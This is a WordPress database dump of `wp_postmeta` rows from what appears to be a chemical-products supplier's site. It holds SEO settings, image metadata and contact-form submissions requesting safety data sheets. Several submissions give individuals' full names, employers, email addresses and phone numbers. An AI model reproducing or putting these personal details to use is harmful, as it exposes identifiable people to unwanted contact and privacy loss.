INSERT INTO `wp_postmeta` VALUES (20818, 2174, '_wp_attached_file', '2016/09/MS-538N_539N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20819, 2175, '_wp_attached_file', '2016/09/MS-550N-552N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20820, 2176, '_wp_attached_file', '2016/09/MS-580N-582N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20821, 2177, '_wp_attached_file', '2016/09/MS-755_757.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20822, 2178, '_wp_attached_file', '2016/09/G0831B.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20823, 2179, '_wp_attached_file', '2016/09/MS-110XN.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20824, 2180, '_wp_attached_file', '2016/09/MS-114C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20825, 2181, '_wp_attached_file', '2016/09/MS-122AD.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20826, 2182, '_wp_attached_file', '2016/09/MS-122AV.pdf'); 
INSERT INTO `wp_postmeta` VALUES (20827, 2191, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20828, 2191, '_seq_num', '8'); 
INSERT INTO `wp_postmeta` VALUES (20829, 2191, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20830, 2191, '_field_12', 'keith crider'); 
INSERT INTO `wp_postmeta` VALUES (20831, 2191, '_field_13', 'northrop grumman'); 
INSERT INTO `wp_postmeta` VALUES (20832, 2191, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20833, 2191, '_field_14', 'keith.crider@ngc.com'); 
INSERT INTO `wp_postmeta` VALUES (20834, 2191, '_field_15', '(410) 993-2840'); 
INSERT INTO `wp_postmeta` VALUES (20835, 2191, '_field_16', 'requesting sds for aero-duster MS-222L'); 
INSERT INTO `wp_postmeta` VALUES (20836, 2191, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20837, 2191, '_sub_id', '2191'); 
INSERT INTO `wp_postmeta` VALUES (20838, 2192, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20839, 2192, '_seq_num', '9'); 
INSERT INTO `wp_postmeta` VALUES (20840, 2192, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20841, 2192, '_field_12', 'Annop'); 
INSERT INTO `wp_postmeta` VALUES (20842, 2192, '_field_13', 'Celestica (Thailand)'); 
INSERT INTO `wp_postmeta` VALUES (20843, 2192, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (20844, 2192, '_field_14', 'athongs@celestica.com'); 
INSERT INTO `wp_postmeta` VALUES (20845, 2192, '_field_15', '(663) 849-3561'); 
INSERT INTO `wp_postmeta` VALUES (20846, 2192, '_field_16', 'request to get SDS for MS-122AD'); 
INSERT INTO `wp_postmeta` VALUES (20847, 2192, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20848, 2192, '_sub_id', '2192'); 
INSERT INTO `wp_postmeta` VALUES (20850, 1121, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (20851, 1121, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20852, 1121, '_yoast_wpseo_focuskw_text_input', 'Vertrel'); 
INSERT INTO `wp_postmeta` VALUES (20853, 1121, '_yoast_wpseo_focuskw', 'Vertrel'); 
INSERT INTO `wp_postmeta` VALUES (20854, 1121, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20855, 1121, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20856, 1121, '_wp_old_slug', 'why-vertrel-specialty-fluids-are-a-suitable-replacement-for-npb'); 
INSERT INTO `wp_postmeta` VALUES (20857, 1121, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (20859, 1121, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (20860, 957, '_wp_attachment_image_alt', 'vertrel fluids'); 
INSERT INTO `wp_postmeta` VALUES (20862, 64, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20863, 64, '_yoast_wpseo_linkdex', '74'); 
INSERT INTO `wp_postmeta` VALUES (20866, 2198, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20867, 2198, '_seq_num', '10'); 
INSERT INTO `wp_postmeta` VALUES (20868, 2198, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20869, 2198, '_field_12', 'Michael Zurek'); 
INSERT INTO `wp_postmeta` VALUES (20870, 2198, '_field_13', 'Scientific Games'); 
INSERT INTO `wp_postmeta` VALUES (20871, 2198, '_field_18', '23'); 
INSERT INTO `wp_postmeta` VALUES (20872, 2198, '_field_14', 'michael.zurek@scientificgames.com'); 
INSERT INTO `wp_postmeta` VALUES (20873, 2198, '_field_15', '(312) 972-9999'); 
INSERT INTO `wp_postmeta` VALUES (20874, 2198, '_field_16', 'I am updating our SDS records and would like to get the most recent SDS for PTFE Release Agent Lubricant MS-122DF.   Any assistance you could provide is greatly appreciated. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (20875, 2198, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (20876, 2198, '_sub_id', '2198'); 
INSERT INTO `wp_postmeta` VALUES (20881, 2201, '_wp_attached_file', '2016/09/vertrel-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (20882, 2201, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:21:"2016/09/vertrel-1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"vertrel-1-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"vertrel-1-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"vertrel-1-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"vertrel-1-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20883, 2202, '_wp_attached_file', '2016/09/finish-line.jpg'); 
INSERT INTO `wp_postmeta` VALUES (20884, 2202, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:23:"2016/09/finish-line.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"finish-line-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"finish-line-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"finish-line-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"finish-line-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20886, 2205, '_wp_attached_file', '2016/09/glidesys-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (20887, 2205, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:22:"2016/09/glidesys-1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"glidesys-1-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"glidesys-1-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"glidesys-1-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"glidesys-1-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20888, 2206, '_wp_attached_file', '2016/09/releasys-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (20889, 2206, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:22:"2016/09/releasys-1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"releasys-1-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"releasys-1-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"releasys-1-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"releasys-1-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20890, 2208, '_wp_attached_file', '2016/09/vertrel-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (20891, 2208, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:480;s:6:"height";i:198;s:4:"file";s:21:"2016/09/vertrel-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"vertrel-2-340x198.jpg";s:5:"width";i:340;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"vertrel-2-250x198.jpg";s:5:"width";i:250;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"vertrel-2-200x198.jpg";s:5:"width";i:200;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"vertrel-2-225x198.jpg";s:5:"width";i:225;s:6:"height";i:198;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (20892, 116, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20893, 116, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (20894, 116, '_yoast_wpseo_focuskw_text_input', 'Chemical Products'); 
INSERT INTO `wp_postmeta` VALUES (20895, 116, '_yoast_wpseo_focuskw', 'Chemical Products'); 
INSERT INTO `wp_postmeta` VALUES (20896, 116, '_yoast_wpseo_metadesc', 'With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery on your chemical products.'); 
INSERT INTO `wp_postmeta` VALUES (20897, 116, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (20898, 116, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20899, 2211, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20900, 2211, '_seq_num', '13'); 
INSERT INTO `wp_postmeta` VALUES (20901, 2211, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20902, 2211, '_field_1', 'David Johnson'); 
INSERT INTO `wp_postmeta` VALUES (20903, 2211, '_field_10', 'Global Email Lists'); 
INSERT INTO `wp_postmeta` VALUES (20904, 2211, '_field_2', 'david@globalemaillists.net'); 
INSERT INTO `wp_postmeta` VALUES (20905, 2211, '_field_8', '(760) 514-0144'); 
INSERT INTO `wp_postmeta` VALUES (20906, 2211, '_field_3', 'Hi,\r\n\r\nI was going through your website. Wanted to check in with you to see if you needed any Data/Leads for your marketing initiatives. We have a number of verticals performing very well right now. Let me know what you are looking for.\r\n\r\nThanks,\r\nDavid Johnson'); 
INSERT INTO `wp_postmeta` VALUES (20907, 2211, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20908, 2211, '_sub_id', '2211'); 
INSERT INTO `wp_postmeta` VALUES (20909, 735, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20910, 735, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20911, 735, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20912, 735, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20913, 735, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-470C","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (20914, 190, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20915, 190, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20916, 190, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20917, 190, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20918, 190, '_yoast_wpseo_focuskeywords', '[{"keyword":"MIL-I-46058C","score":"ok"},{"keyword":"MS-470S","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (20919, 736, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20920, 736, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20921, 736, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20922, 736, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20923, 736, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-472C","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (20924, 738, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20925, 738, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20926, 738, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20927, 738, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20928, 738, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-472S","score":"bad"}]'); 
INSERT INTO `wp_postmeta` VALUES (20929, 2212, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20930, 2212, '_seq_num', '14'); 
INSERT INTO `wp_postmeta` VALUES (20931, 2212, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20932, 2212, '_field_1', 'Lee'); 
INSERT INTO `wp_postmeta` VALUES (20933, 2212, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (20934, 2212, '_field_2', 'straightshooter@vtc.net'); 
INSERT INTO `wp_postmeta` VALUES (20935, 2212, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (20936, 2212, '_field_3', 'What&#039;s up with Aero Duster MS 222?  I am having a hard time buying on line and your chat seems to be down. Is this being phased out?  What replaces it.\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (20937, 2212, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20938, 2212, '_sub_id', '2212'); 
INSERT INTO `wp_postmeta` VALUES (20939, 2213, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20940, 2213, '_seq_num', '15'); 
INSERT INTO `wp_postmeta` VALUES (20941, 2213, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20942, 2213, '_field_1', 'Don Wojtaszek'); 
INSERT INTO `wp_postmeta` VALUES (20943, 2213, '_field_10', 'The Carnelian Group, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (20944, 2213, '_field_2', 'carneliangroup@comcast.net'); 
INSERT INTO `wp_postmeta` VALUES (20945, 2213, '_field_8', '(708) 558-9275'); 
INSERT INTO `wp_postmeta` VALUES (20946, 2213, '_field_3', 'I am looking for your Safezone Cleaner MS-260.  is it still available?'); 
INSERT INTO `wp_postmeta` VALUES (20947, 2213, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20948, 2213, '_sub_id', '2213'); 
INSERT INTO `wp_postmeta` VALUES (20959, 713, '_wp_old_slug', 'aut-2045'); 
INSERT INTO `wp_postmeta` VALUES (20960, 713, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20961, 713, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20962, 713, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20963, 713, '_yoast_wpseo_focuskw_text_input', 'Krytox AUT 2045'); 
INSERT INTO `wp_postmeta` VALUES (20964, 713, '_yoast_wpseo_focuskw', 'Krytox AUT 2045'); 
INSERT INTO `wp_postmeta` VALUES (20965, 713, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20966, 713, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20967, 713, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (20968, 713, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (20969, 713, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (20970, 713, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (20971, 713, '_ywtm_content_tab_description', 'Krytox AUT 2045'); 
INSERT INTO `wp_postmeta` VALUES (20972, 713, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (20973, 425, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20974, 425, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20975, 425, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20976, 425, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20977, 425, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (20978, 714, '_wp_old_slug', 'aut-2245'); 
INSERT INTO `wp_postmeta` VALUES (20979, 714, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (20980, 714, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (20981, 714, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (20982, 714, '_yoast_wpseo_focuskw_text_input', 'Krytox AUT 2245'); 
INSERT INTO `wp_postmeta` VALUES (20983, 714, '_yoast_wpseo_focuskw', 'Krytox AUT 2245'); 
INSERT INTO `wp_postmeta` VALUES (20984, 714, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (20985, 714, '_yoast_wpseo_focuskeywords', '[{"keyword":"Krytox AUT 2245","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (20986, 2217, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (20987, 2217, '_seq_num', '17'); 
INSERT INTO `wp_postmeta` VALUES (20988, 2217, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20989, 2217, '_field_1', 'Zayyanul Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (20990, 2217, '_field_10', 'Miller-Stephenson Test'); 
INSERT INTO `wp_postmeta` VALUES (20991, 2217, '_field_2', 'zayyanc@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (20992, 2217, '_field_8', '(917) 370-5939'); 
INSERT INTO `wp_postmeta` VALUES (20993, 2217, '_field_3', 'adasdasdasdad'); 
INSERT INTO `wp_postmeta` VALUES (20994, 2217, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (20995, 2217, '_sub_id', '2217'); 
INSERT INTO `wp_postmeta` VALUES (20996, 2218, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (20997, 2218, '_seq_num', '11'); 
INSERT INTO `wp_postmeta` VALUES (20998, 2218, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (20999, 2218, '_field_12', 'Zayyanul Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (21000, 2218, '_field_13', '21312312231312312'); 
INSERT INTO `wp_postmeta` VALUES (21001, 2218, '_field_18', '3423234234234234'); 
INSERT INTO `wp_postmeta` VALUES (21002, 2218, '_field_14', 'zayyanc@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (21003, 2218, '_field_15', '(321) 321-3213'); 
INSERT INTO `wp_postmeta` VALUES (21004, 2218, '_field_16', 'asdasdasdasdasdasda test rads'); 
INSERT INTO `wp_postmeta` VALUES (21005, 2218, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21006, 2218, '_sub_id', '2218'); 
INSERT INTO `wp_postmeta` VALUES (21008, 2212, '_edit_lock', '1475675823:2'); 
INSERT INTO `wp_postmeta` VALUES (21009, 2157, '_edit_lock', '1475675866:2'); 
INSERT INTO `wp_postmeta` VALUES (21010, 2129, '_edit_lock', '1475676298:2'); 
INSERT INTO `wp_postmeta` VALUES (21011, 2137, '_edit_lock', '1475675886:2'); 
INSERT INTO `wp_postmeta` VALUES (21012, 2073, '_edit_lock', '1475675915:2'); 
INSERT INTO `wp_postmeta` VALUES (21013, 2037, '_edit_lock', '1475675942:2'); 
INSERT INTO `wp_postmeta` VALUES (21024, 2213, '_edit_lock', '1475502936:2'); 
INSERT INTO `wp_postmeta` VALUES (21025, 2211, '_edit_lock', '1475675977:2'); 
INSERT INTO `wp_postmeta` VALUES (21030, 2138, '_edit_lock', '1475503209:2'); 
INSERT INTO `wp_postmeta` VALUES (21046, 2031, '_edit_lock', '1475675952:2'); 
INSERT INTO `wp_postmeta` VALUES (21047, 2067, '_edit_lock', '1475676436:2'); 
INSERT INTO `wp_postmeta` VALUES (21048, 2119, '_edit_lock', '1475676428:2'); 
INSERT INTO `wp_postmeta` VALUES (21049, 2135, '_edit_lock', '1475503784:2'); 
INSERT INTO `wp_postmeta` VALUES (21050, 2145, '_edit_lock', '1475503823:2'); 
INSERT INTO `wp_postmeta` VALUES (21051, 2146, '_edit_lock', '1475503868:2'); 
INSERT INTO `wp_postmeta` VALUES (21052, 2147, '_edit_lock', '1475676413:2'); 
INSERT INTO `wp_postmeta` VALUES (21053, 2191, '_edit_lock', '1475676405:2'); 
INSERT INTO `wp_postmeta` VALUES (21054, 2192, '_edit_lock', '1475676395:2'); 
INSERT INTO `wp_postmeta` VALUES (21055, 2198, '_edit_lock', '1475676384:2'); 
INSERT INTO `wp_postmeta` VALUES (21066, 715, '_wp_old_slug', 'aut-2a45'); 
INSERT INTO `wp_postmeta` VALUES (21067, 715, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21068, 715, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21069, 715, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21070, 715, '_yoast_wpseo_focuskw_text_input', 'Krytox AUT 2A45'); 
INSERT INTO `wp_postmeta` VALUES (21071, 715, '_yoast_wpseo_focuskw', 'Krytox AUT 2A45'); 
INSERT INTO `wp_postmeta` VALUES (21072, 715, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21073, 715, '_yoast_wpseo_focuskeywords', '[{"keyword":"Krytox AUT 2A45","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (21074, 717, '_wp_old_slug', 'aut-2e45'); 
INSERT INTO `wp_postmeta` VALUES (21075, 717, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21076, 717, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21077, 717, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21078, 717, '_yoast_wpseo_focuskw_text_input', 'Krytox AUT 2E45'); 
INSERT INTO `wp_postmeta` VALUES (21079, 717, '_yoast_wpseo_focuskw', 'Krytox AUT 2E45'); 
INSERT INTO `wp_postmeta` VALUES (21080, 717, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21081, 717, '_yoast_wpseo_focuskeywords', '[{"keyword":"Krytox AUT 2E45","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (21082, 862, '_wp_old_slug', 'lvp'); 
INSERT INTO `wp_postmeta` VALUES (21083, 862, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21084, 862, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21085, 862, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21086, 862, '_yoast_wpseo_focuskw_text_input', 'Krytox LVP'); 
INSERT INTO `wp_postmeta` VALUES (21087, 862, '_yoast_wpseo_focuskw', 'Krytox LVP'); 
INSERT INTO `wp_postmeta` VALUES (21088, 862, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21089, 862, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21090, 862, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21091, 943, '_wp_old_slug', '1506-copy'); 
INSERT INTO `wp_postmeta` VALUES (21092, 943, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21093, 943, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21094, 943, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21095, 943, '_yoast_wpseo_focuskw_text_input', 'Krytox VPF'); 
INSERT INTO `wp_postmeta` VALUES (21096, 943, '_yoast_wpseo_focuskw', 'Krytox VPF'); 
INSERT INTO `wp_postmeta` VALUES (21097, 943, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21098, 943, '_yoast_wpseo_focuskeywords', '[{"keyword":"Krytox VPF 1506","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (21099, 944, '_wp_old_slug', '1514'); 
INSERT INTO `wp_postmeta` VALUES (21100, 944, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21101, 944, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21102, 944, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21103, 944, '_yoast_wpseo_focuskw_text_input', 'Krytox VPF 1514'); 
INSERT INTO `wp_postmeta` VALUES (21104, 944, '_yoast_wpseo_focuskw', 'Krytox VPF 1514'); 
INSERT INTO `wp_postmeta` VALUES (21105, 944, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21106, 944, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21107, 954, '_wp_old_slug', '1525'); 
